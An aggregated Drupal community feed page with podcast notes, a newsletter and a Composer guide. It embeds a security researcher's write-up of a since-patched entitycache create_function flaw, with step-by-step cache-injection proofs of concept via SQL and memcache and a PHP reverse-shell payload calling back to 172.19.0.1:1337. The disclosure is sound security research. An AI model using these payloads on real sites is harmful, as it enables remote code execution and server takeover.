Feeds
FSF Events: FSF Free Software Community Meetup on December 15, 2023
Talking Drupal: Talking Drupal #426 - Needs Review Queue Initiative
Today we are talking about the Needs Review Queue Initiative, what it is, and how it’s helping to improve Drupal, with guest Stephen Mustgrave. We’ll also cover Translation Management Tool as our module of the week.
For show notes visit: www.talkingDrupal.com/426
Topics
- Can you give an overview of Needs Review Issue Queue Initiative
- Is the bug smash initiative related to the needs review issue queue
- Is this the same as the needs review bot
- How many issues were in the Needs Review status when you started
- How many issues today
- How long did it take until it was manageable
- How long do items stay on average
- Who else is helping
- Let’s talk through the pagination heading level issue
- What help can the community provide
- How does someone get involved
- Do you think this helps with burnout for core committers
- What’s the future of the initiative
Stephen Mustgrave - smustgrave
Hosts
Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Melissa Bent - linkedin.com/in/melissabent merauluka
MOTW Correspondent
Martin Anderson-Clutz - @mandclu
Translation Management Tool (TMGMT)
- Brief description:
- Have you ever wanted to automate the process of creating content translations on your Drupal site? There’s a module for that.
- Brief history
- How old: created in Jan 2012
- Versions available: 7.x-1.0-rc3 and 8.x-1.15, the latter of which works with Drupal 9 and 10
- Maintainership
- Actively maintained
- Test coverage
- Documentation
- Number of open issues: 595, 139 of which are bugs against the 8.x branch
- Usage stats:
- 8,766 sites
- Maintainer(s):
- Berdir, a very prolific maintainer in his own right, who also supports well known projects like Search API, Token, Paragraphs, and many more
- Module features and usage
- Provides a tool set for automating the process of creating translations for your site content, as well as strings used within the site like menus, interface text, and so on
- Works with more than 30 translation service providers, including many that leverage human translators, but also AI-based services like DeepL and OpenAI
- Also has a plugin system to determine what text needs to be translated, so it can be easily adapted to very custom needs
- With the module installed, the Translate tab on your nodes changes to have buttons to request a translation in each language
- Once a translation has been requested, it will run through states like unprocessed, active, and finished
- Also provides an option for Continuous Translation, where new and updated content is automatically submitted for translation
- Allows for professional translation at scale, using whatever kind of service works best for your site
- The need for robust translation capabilities is what originally got me started using Drupal, so it’s great to see that there are enterprise-grade options for sites that need to manage translations at scale
mcdruid.co.uk: Remote Code Execution in Drupal via cache injection, drush, entitycache, and create_function
PHP's create_function() was:
DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0
As the docs say, its use is highly discouraged.
PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular Linux distributions provide support for years beyond the upstream End of Life).
Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.
The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.
The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.
This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.
To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.
Is it unsafe input?
Interestingly, the issue is in a drush-specific .inc file:
/**
 * Implements hook_drush_cache_clear().
 */
function entitycache_drush_cache_clear(&$types) {
  $entities = entity_get_info();
  foreach ($entities as $type => $info) {
    if (isset($info['entity cache']) && $info['entity cache']) {
      // You can't pass paramters to the callbacks in $types, so create an
      // anonymous function for each specific bin.
      $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);");
      $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba;
    }
  }
}

https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...
Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.
So - as is often the case - it's very risky to pass unsafe user input to it.
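To make the breakout mechanism concrete, here is a minimal standalone sketch (not taken from the module, and it only runs on PHP < 8 where create_function() still exists) of how a crafted value in that position escapes the intended function body:

<?php
// Contrived illustration: $type stands in for an attacker-controlled array key.
$type = "foo', TRUE);} echo 'injected code runs here'; //";

// create_function() effectively eval()s the generated function body, so the "}"
// in $type closes the lambda early, the echo becomes top-level code that runs
// immediately when the function is defined, and the trailing "//" comments out
// the leftover fragment. The function never needs to be called, so the
// undefined cache_clear_all() is never actually reached.
$lambda = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);");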
In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().
Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?
entity_get_info() uses a cache to minimise calls to implementations of hook_entity_info.
If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.
Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.
How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:
Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.
So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.
We'll also look at how an attacker might use memcache as an attack vector.
Proof of Concept
To keep things simple initially, we'll look at conducting the attack via SQL.
Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.
As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.
Objectives
- The malicious payload has to be injected into the array keys of the cached data returned by entity_get_info().
- The injection cannot break Drupal so badly that drush cannot run a cache clear.
- However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).
We can see that the relevant cache item here is:
$cache = cache_get("entity_info:$langcode")

The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:
array('malicious payload' => 'foo');

Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_get_info() will return.
The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.
We can use drush to run some simple code that stores our array into the cache:
$ drush php
>>> $entity_info = array('malicious payload' => 'foo');
=> [
     "malicious payload" => "foo",
   ]
>>> cache_set('entity_info:en', $entity_info);

Now let's look at the cache item in the db:
$ drush sqlc
> SELECT * FROM cache WHERE cid = 'entity_info:en';
+----------------+-------------------------------------------+--------+------------+------------+
| cid            | data                                      | expire | created    | serialized |
+----------------+-------------------------------------------+--------+------------+------------+
| entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} | 0      | 1696593295 | 1          |
+----------------+-------------------------------------------+--------+------------+------------+

Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)
How is the site doing now? Let's try a drush status:
$ drush st
Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc).
Drush was not able to start (bootstrap) Drupal.
Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.

That's not so great, and importantly we get the same error when we try to clear caches by running drush cc all.
We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.
The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.
It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.
We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb) and is therefore quite cumbersome to manipulate.
Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.
It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.
Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:
$entity_info['user'] = [
  'controller class' => 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user']
];

Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.
Let's try injecting that into the cache via drush php and then checking whether drush is still functional.
It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.
$ cat cache_injection.php
<?php
$entity_info['user'] = [
  'controller class' => 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user']
];
cache_set('entity_info:en', $entity_info);

$ drush scr cache_injection.php

$ drush st
 Drupal version : 7.99-dev
 ...snip - no errors...

$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => malicious payload
)

We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.
$ drush cc all
'all' cache was cleared.
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => comment
    [1] => node
    [2] => file
    [3] => taxonomy_term
    [4] => taxonomy_vocabulary
    [5] => user
)

We're making progress though.
Let's try putting an actual payload into the array key in our script:
$ tail -n7 cache_injection.php
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user']
];
cache_set('entity_info:en', $entity_info);

$ drush scr cache_injection.php
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);} echo "code execution successful"; //
)
$ drush cc all
code execution successfulcode execution successful'all' cache was cleared.

Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.
A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.
Having said that we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do that, they don't really need to mess around with injecting payloads into the caches.
Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.
Attack via SQLi
If we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";'
a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}

This is not very pretty to look at, but we can see our array has been serialized.
If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.
To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.
After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.
Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.
I often think fiddly things like this are the hardest part of developing these PoC exploits!
# inject the payload using a drush script
$ drush scr cache_injection.php

# extract the payload into a SQL statement stored in a file
$ echo -n "UPDATE cache SET data = '" > sqli.txt
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt
$ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt

# empty the cache table, and repopulate it with valid entries
$ drush sqlq 'DELETE FROM cache;'
$ drush st

# inject the payload, simulating SQLi
$ cat sqli.txt | drush sqlc

# execute the attack
$ drush cc all
code execution successful ...

So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.
In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.
However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.
Attack via memcache
How about if the caches are in memcache; what might an attack look like then?
First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.
The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.
The mechanics of how we might do so are a little different with a "memcache injection" though.
The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).
In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.
Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:
$ echo "stats slabs" | nc memcached 11211 | head -n2 STAT 2:chunk_size 120 STAT 2:chunks_per_page 8738 $ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2 ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s] ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.
So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.
We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.
There are a couple of small complications we're likely to encounter with this workflow.
One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.
If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.
We can get around this by disabling compression on our test site.
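As a rough sketch of what that could look like (assuming the test site uses the Drupal 7 memcache module with the Memcached PECL extension; the exact settings key can vary between module versions, so check the module's README):

<?php
// settings.php on the disposable *test* site, not the target.
// Assumption: the memcache module passes these options through to the
// Memcached PECL client, so items are stored uncompressed.
$conf['memcache_options'] = array(
  Memcached::OPT_COMPRESSION => FALSE,
);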
Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).
This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp intact, it's possible that the item will already be expired by the time the payload is injected into the target site, and the attack will not work.
It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.
There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.
Injecting an item into memcache will typically mean using the SET command.
The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).
Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.
We also need to ensure that the PHP serialized data remains consistent; for example if we change an IP address we need to ensure that the string it's within still has the correct length e.g. s:80:\"foo' ...
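One way to keep those numbers consistent is to build the blob on the test site and measure it there. This is a rough sketch (run via drush scr on the disposable test site, assuming the minimal $entity_info array from the earlier cache_injection.php script is in scope); the object fields mirror the payload shown below:

<?php
// Build the cache wrapper object in the same shape as the serialized payload
// below, with forged bookkeeping fields so neither memcached nor Drupal's
// cache API treats the item as expired or flushed.
$item = new stdClass();
$item->cid = 'entity_info:en';
$item->data = $entity_info;                    // minimal user/file skeleton plus the malicious key
$item->created = 9999999999;                   // far-future timestamp
$item->created_microtime = 9999999999.2850001;
$item->expire = 0;                             // CACHE_PERMANENT
$item->flushes = 999;                          // high flush counter

$blob = serialize($item);
echo strlen($blob) . "\n";                     // byte count for the memcached SET line
echo $blob . "\n";                             // data to send after the SET command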
Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:
$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().
$ ./poison_entity_info.sh    # this script contains the memcache set command above
STORED
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);//
)
$ drush cc all
'all' cache was cleared.

Meanwhile in the attacker's terminal...
$ nc -nvlp 1337
Listening on 0.0.0.0 1337
Connection received on 172.19.0.3 58220
python -c 'import pty; pty.spawn("/bin/bash")'
mcdruid@drupal-7:/var/www/html$ head -n2 CHANGELOG.txt

Drupal 7.xx, xxxx-xx-xx (development version)
-----------------------

We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.
One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.
Perhaps the injection into the entity_info cache item already achieves that goal?
Could this attack also be carried out via Redis? Probably.
I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.
As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().
Thanks to Greg Knaddison (greggles) for reviewing this post.
Tags: drupal-planet, security, rce, php, drush

The Drop Times: The Transformative Power of Stories in the Drupal Community
Dear Readers,
"There's always room for a story that can transport people to another place."
—J.K. Rowling, Author of the Harry Potter Series

Stories wield an irresistible charm, not merely as narratives to absorb but as potent wellsprings of inspiration. With their unique ability to engage, convey essential messages, and kindle our imagination, stories have been passed down through generations, nestled in books, or shared through diverse media. They possess the remarkable power to evoke emotions and offer insights that resonate across cultures.
Beyond mere entertainment, stories often carry valuable lessons, acting as a bridge to connect individuals and fostering a sense of wonder and empathy. Through the art of storytelling, individuals gain fresh perspectives, discover motivation, and shape their understanding of the world and their identities.
In the Drupal community, Dries Buytaert, the visionary founder of Drupal, extends a heartfelt invitation. He encourages members to share their personal stories, illustrating how Drupal has left an indelible mark on their lives and careers. This initiative underscores the power of stories in nurturing community, collaboration, and shared experiences within the Drupal ecosystem.
As J.K. Rowling aptly notes, there's always room for stories that transport us to new realms. Within the Drupal community, these stories serve as a bridge connecting individuals through the transformative impact of Drupal on their professional journeys.
So, what is your Drupal story? Share and become part of the collective narrative that defines the Drupal experience.
Let us look into last week's stories by The Drop Times.
Last week, The Drop Times published part one of the interview featuring Grzegorz Pietrzak, a seasoned Tech Lead at Droptica specializing in PHP, Drupal, and Symfony. Engaging in a profound discussion with Thomas Alias K, a former sub-editor at TDT, Pietrzak shared distinguished perspectives on various facets of Drupal, the dynamic role of Droopler in corporate website development, and his insights into constructing effective PHP teams.
The latest featured stories by our sub-editor, Alka Elizabeth, dive into notable happenings within the Drupal community. An insightful examination of challenges encountered in Drupal Distributions and Recipes Initiative takes center stage as contributor Jim Birch sheds light on a pertinent issue. This discovery catalyzes an ongoing initiative to address and overcome challenges associated with these essential elements of Drupal development.
Further contributing to Drupal's evolution, an adjustment was proposed by Alex Pott in response to issue #339889, which is set to bring about a significant change in the upcoming 10.2.x version of the Drupal core. This modification aims to streamline the configuration system, eliminating the need to list configuration in 'getEditableConfigNames()' when using '#config_target' in forms. The goal is to enhance the developer experience by simplifying processes and eliminating redundant configuration declarations.
Additionally, a substantial change in Drupal Core has been implemented in version 10.2.x. The widely recognized EntityReferenceTestTrait has undergone a renaming to EntityReferenceFieldCreationTrait. Behind this transformative modification is the dedicated effort of contributor Stephen Mustgrave, and it officially took effect on November 16, 2023.
DrupalCon Portland 2024 is currently seeking volunteers and summit contributors. Florida DrupalCamp 2024 is gearing up for its sixteenth annual event and searching for sponsors. The event will happen at the Florida Technical College in Orlando. If you're interested in sponsoring Florida DrupalCamp 2024 or would like to get more information about the event, including dates, available training sessions, and registration details, head nowhere else. Learn more about this week's Drupal events here.
MidCamp, the Midwest Drupal Camp, has officially opened its call for session submissions for its 2024 event. Additionally, FOSDEM, the renowned free software event fostering collaboration and idea sharing within the open-source community, invites participation in presentations for its upcoming twenty-fourth edition scheduled for February 3rd and 4th, 2024.
Specbee published a blog exploring the significance of Drupal 10 Theming. Additionally, they are hosting a webinar titled "Getting Started with Drupal 10 Theming," scheduled for December 6, 2023.
The Acquia Engage conference ended with discussions centered around experimentation and exploration. These emerging trends were featured in an article by Dom Nicastro. Discover the enhanced capabilities of the Drupal platform with the introduction of new features and improvements in Drupal 10.1. Dive deeper into these updates by reading the blog.
The digital landscape undergoes further evolution as PHP unveils its newest version, PHP 8.3. This latest iteration, packed with a myriad of enhancements and refinements, is poised to make a substantial impact on web development.
Lucio Waßill's demonstration on the Migrate Module provided valuable insights into establishing a demo-ready Drupal environment. The emphasis was on optimizing content creation processes by effectively utilizing the Migrate module.
Prepare for the imminent arrival of Drupal Gutenberg 3, as the beta version is now available for testing under Gutenberg 3.0.0-beta1. Users eager to integrate this update into Drupal 10 can seamlessly do so using Composer with the installation command. Revamp Drupal search boxes effortlessly with the Better Search Block: a user-friendly solution developed by 3C Web Services and maintained by Yogesh Pawar. This module stands out for its ability to enhance both the visual appeal and functionality of Drupal search boxes.
Dries Buytaert, the visionary behind Drupal, extends a heartfelt invitation to the Drupal community, encouraging individuals to share their personal narratives on Drupal's profound impact on their lives and careers.
Explore enhanced Drupal development efficiency by delving into the synergy between Visual Studio Code and DDEV in OSTraining's latest blog post. Gain practical insights into leveraging Visual Studio Code, a widely used and robust source-code editor, to streamline and optimize your Drupal development workflows. Droptica releases Drupal Website Maintenance Guide, a comprehensive e-book tailored for Drupal website owners seeking effective strategies for support, care, and maintenance.
So these are the highlights from TheDropTimes. Feel free to contact us with any suggestions, contributions, or feedback. Thank you for being a part of our community. Until the next edition, keep exploring, sharing, and embracing the power of knowledge! Follow us on LinkedIn, Twitter and Facebook.
Sincerely,
Elma John
Sub-editor, The DropTimes
Mike Driscoll: Episode 23 – The Ruff Formatter with Charlie Marsh
Ruff is a Python linter written in Rust that is super fast. The people behind Ruff recently released a new tool, part of Ruff itself, that lets Ruff format your Python code using the Black rules.
In this episode, I speak with Charlie Marsh, the original creator of Ruff and the founder of Astral, the company behind Ruff.
In this episode, we talked about:
- The Ruff formatter and linter
- How Ruff came about
- The hardest features to create
- The future of Ruff
- Python vs Rust
- and more!
The post Episode 23 – The Ruff Formatter with Charlie Marsh appeared first on Mouse Vs Python.
Four Kitchens: Using Composer for modules not ready for the next major version of Drupal
Senior Support Lead
Allan brings technological know-how and grounds it with some simple country living. His interests include DevOps, animal husbandry (raising rabbits and chickens), hiking, and automated testing.
At the time of this blog, we have done two major version upgrades of Drupal and have refined the process along the way. There has been a lot of work in the community, through the efforts of people like Matt Glaman to make this process easier.
As a Support Engineer, I see a lot of approaches for achieving the same results in many areas of my work. Here, I’d like to share with you three different ways to achieve an upgrade of a module or theme that isn’t ready for the next major Drupal version, each with pros and cons, but all absolutely acceptable.
Why do we have this problem?
All new Drupal developers have a hard time with the layers of code changes that happen in the Drupal community. We have custom package types, custom install locations, patches, and scaffolding. To make the challenges worse, we have two ways to identify a module’s dependencies — that being a .info.yml file and for some, a composer.json. This is because some Drupal modules may want to build upon an existing PHP library or project, in addition to other Drupal modules. To ease the pain of having to define some dependencies twice, both in the .info.yml file and composer.json file, Drupal.org built their packagist, a repository of Composer packages, to read the .info.yml files from the root of the project and create Composer version constraints from that. For example, if the .info file contained the following:
name: My Module
type: module
core_version_requirement: ^8.8 || ^9
dependencies:
  - ctools:ctools

Then Drupal.org’s packagist would create the following for the release that contained that .info.yml file, saving the contributed developer a lot of trouble.
{ "type": "drupal-module", "name": "drupal/my_module", "require": { "drupal/core": "^8.8 || ^9", "drupal/ctools": "*" } }I hit on something there, though. It will create that for the release the .info.yml was in. When most code changes come in the form of patches, this poses a challenge. You apply your patch to the .info.yml after you download the release from Drupal.org’s packagist. Additionally, Drupal.org doesn’t create a new release entry for every patch file in the issue queue. So you are left with the question, “How do I install a module on Drupal 10 that requires Drupal 9 so that I can patch it to make it compatible for Drupal 10?”
Drupal Lenient
One of the easiest methods for those who don’t understand the ins and outs of Composer is to use the Drupal Lenient plugin. It takes a lot of the manual work out of defining new packages and works with any drupal-* typed library. Types are introduced to us through the use of the Composer Installers plugin and manipulated further with something like Composer Installers Extender. Composer plugins can be quite powerful, but they ultimately add a layer of complexity to any project over using core Composer tactics.
Drupal Lenient works by taking any defined package pulled in by any means via Composer and replacing its drupal/core version constraint (currently, at the time of this writing, with "^8 || ^9 || ^10"). So where the requirement might look like the earlier example, "drupal/core": "^8.8 || ^9", it is replaced, making it now possible to install alongside Drupal 10, even though the module might not be marked as compatible yet. This allows you to patch, test, or use the module as is, much as if you had downloaded the zip and thrown it into your custom modules directory.
An example may look like this:
{ "name": "vendor/project", "repositories": [ { "type": "composer", "url": "https://packages.drupal.org/8" } ], "require": { "drupal/core": "^10.0.0", "drupal/my_module": "1.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, "drupal-lenient": { "allowed-list": [ "drupal/my_module" ] }, "patches": { "drupal/my_module": { "3289029: Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2022-06-16/my_module.1.x-dev.rector.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } }Note the Drupal-Lenient allow list. Also note that you will need to make sure and install the plugin before trying to install the module that doesn’t support Drupal 10 in this case. If you want an excellent step-by-step, Matt put one together in the Readme.
The pros:
- Easy-peasy to install
- Feeds off the original packagist packages, so if there is an upgrade, you don’t have to do anything special to transition
The cons:
- Lenient has the control and may cause inexplicable errors when updating due to unsupported core versions
- PHP devs not familiar with Drupal Lenient won’t know to look for it
- Flaky experiences when switching in and out of branches that include this plugin. If you context switch a lot, be prepared to handle some errors due to Composer’s challenges maintaining state between branches.
- Patches to other dependencies inside composer.json still require you to run through some hoops
Custom package
If you want more control over what the module can and cannot do, while keeping the core of Composer functionality without adding yet another plugin, check out this method. What we will do here is find out what version the patch or merge request is being applied against. It should be stated in the issue queue and by best practices is a dev version.
If you are a perfectionist, you can use composer install -vvv to find the url or cache file that the module came from for packages.drupal.org. It is usually one of https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json or https://packages.drupal.org/files/packages/8/p2/drupal/my_module~dev.json. You will note that the Composer cache system follows a very similar structure, swapping out certain characters with dashes.
With this information, you can grab the exact package as it’s defined in the Drupal packagist. Find the version you want, and then get it into your project’s composer.json.
Let’s use Context Active Trail as an example, because at the time of this writing, there is no Drupal 10 release available.
Looking through the issue queue, we see Automated Drupal 10 compatibility fixes, which has a patch on it. I grab the Composer package info and paste the 2.0-dev info into my composer.json under the “repositories” section as a type “package.”
Which should make your project look something like this:
